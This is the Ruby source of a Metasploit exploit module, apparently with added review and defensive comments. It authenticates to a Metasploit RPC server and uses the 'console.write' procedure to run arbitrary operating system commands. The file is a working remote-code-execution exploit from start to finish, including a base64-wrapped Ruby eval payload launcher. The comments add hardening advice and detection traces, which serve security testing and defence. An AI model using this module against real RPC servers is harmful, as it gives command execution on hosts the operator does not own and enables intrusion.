GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/msf_rpc_console.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
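# Metasploit module that runs operating system commands on the host of a
# Metasploit RPC server through the authenticated 'console.write' procedure.
#
# Nothing in this module bypasses authentication: it logs in with the supplied
# USERNAME/PASSWORD and then uses the console procedures of the RPC API. The
# security-relevant point is therefore that a valid set of RPC credentials is
# equivalent to command execution on the RPC host. For anyone running the RPC
# service this means keeping the listener (RPORT defaults to 55552 here) off
# untrusted networks and treating the RPC password as a remote-login secret.
# Observable traces of this technique are an RPC login followed by
# 'console.create' / 'console.write' from an unexpected client.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (description, references, targets) and the
  # connection options: RPORT, USERNAME, PASSWORD and SSL.
  #
  # @param info [Hash] metadata passed in by the framework and merged with the
  #   values below via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Metasploit RPC Console Command Execution',
        'Description' => %q{
          This module connects to a specified Metasploit RPC server and
          uses the 'console.write' procedure to execute operating
          system commands. Valid credentials are required to access the
          RPC interface.

          This module has been tested successfully on Metasploit 4.15
          on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
          4.14 on Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => 'bcoles',
        'References' => [
          [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
          [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
        ],
        'Targets' => [
          [
            'Ruby', {
              'Arch' => ARCH_RUBY,
              'Platform' => 'ruby',
              'Payload' => { 'BadChars' => "\x00" }
            }
          ],
          [
            'Windows CMD', {
              'Arch' => ARCH_CMD,
              'Platform' => 'win',
              'Payload' => { 'BadChars' => "\x00\x0A\x0D" }
            }
          ],
          [
            'Unix CMD', {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix',
              'Payload' => { 'BadChars' => "\x00\x0A\x0D" }
            }
          ]
        ],
        'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
        'Privileged' => false,
        'DisclosureDate' => '2011-05-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    register_options [
      Opt::RPORT(55552),
      OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
      OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
      OptBool.new('SSL', [ true, 'Use SSL', true])
    ]
  end

  # Writes +cmd+, wrapped in CRLF, to the console identified by @console_id
  # using the 'console.write' RPC procedure.
  #
  # Fails the module when the call returns nil. When the reply's 'wrote' field
  # is not a decimal number, the reply is printed and the method returns
  # without raising.
  #
  # @param cmd [String] command line to send to the console
  # @param _opts [Hash] accepted for interface compatibility; not used
  def execute_command(cmd, _opts = {})
    res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"

    if res.nil?
      fail_with Failure::Unknown, 'Connection failed'
    end

    unless res['wrote'].to_s =~ /\A\d+\z/
      print_error "Could not write to console #{@console_id}:"
      print_line res.to_s
      return
    end

    vprint_good "Wrote #{res['wrote']} bytes to console"
  end

  # Connects to the RPC server, authenticates, reports the server version,
  # creates a console and sends the payload command to it.
  #
  # Each stage fails the module (fail_with) when its RPC call returns nil; a
  # console id that is not a decimal number is reported and ends the run
  # without raising.
  def exploit
    begin
      @rpc = Msf::RPC::Client.new host: rhost, port: rport, ssl: ssl
    rescue Rex::ConnectionRefused
      fail_with Failure::Unreachable, 'Connection refused'
    rescue StandardError => e
      fail_with Failure::Unknown, "Connection failed: #{e}"
    end

    # The login return value is not needed; success is judged by whether the
    # client now holds a token.
    @rpc.login datastore['USERNAME'], datastore['PASSWORD']

    if @rpc.token.nil?
      fail_with Failure::NoAccess, 'Authentication failed'
    end

    print_good 'Authenticated successfully'
    # NOTE(review): the token is a live session credential. In verbose mode it
    # is written to the operator's output and to anything that captures it.
    vprint_status "Received temporary token: #{@rpc.token}"

    version = @rpc.call 'core.version'

    # Check the reply of the 'core.version' call itself. The original tested
    # the stale login result here, so a nil version reply fell through to the
    # hash lookups below and raised NoMethodError.
    if version.nil?
      fail_with Failure::Unknown, 'Connection failed'
    end

    print_status "Metasploit #{version['version']}"
    print_status "Ruby #{version['ruby']}"
    print_status "API version #{version['api']}"

    vprint_status 'Creating new console...'
    res = @rpc.call 'console.create'

    if res.nil?
      fail_with Failure::Unknown, 'Connection failed'
    end

    unless res['id'].to_s =~ /\A\d+\z/
      print_error 'Could not create console:'
      print_line res.to_s
      return
    end

    @console_id = res['id']
    print_good "Created console ##{@console_id}"

    print_status 'Sending payload...'

    case target['Platform']
    when 'ruby'
      # The payload is base64-encoded so it carries no quote or bracket
      # characters inside the single-quoted -e argument. A command line that
      # starts with `ruby -e 'eval(%[` followed by a long base64 run is a
      # recognisable process-creation pattern on the RPC host.
      cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
    when 'win', 'unix'
      cmd = payload.encoded
    else
      fail_with Failure::NoTarget, 'Invalid target'
    end

    execute_command cmd
  end

  # Destroys the console created by #exploit, if any, and closes the RPC
  # client.
  #
  # The ensure clause runs on every path, including the early return when no
  # console was created.
  def cleanup
    return if @console_id.nil?

    vprint_status 'Removing console...'
    res = @rpc.call 'console.destroy', @console_id

    if res.nil?
      print_error 'Connection failed'
      return
    end

    unless res['result'].eql? 'success'
      print_warning "Could not destroy console ##{@console_id}:"
      print_line res.to_s
      return
    end

    vprint_good "Destroyed console ##{@console_id}"
  ensure
    # @rpc is still nil when the client could not be constructed in #exploit;
    # closing unconditionally raised NoMethodError during cleanup in that case.
    @rpc.close unless @rpc.nil?
  end
end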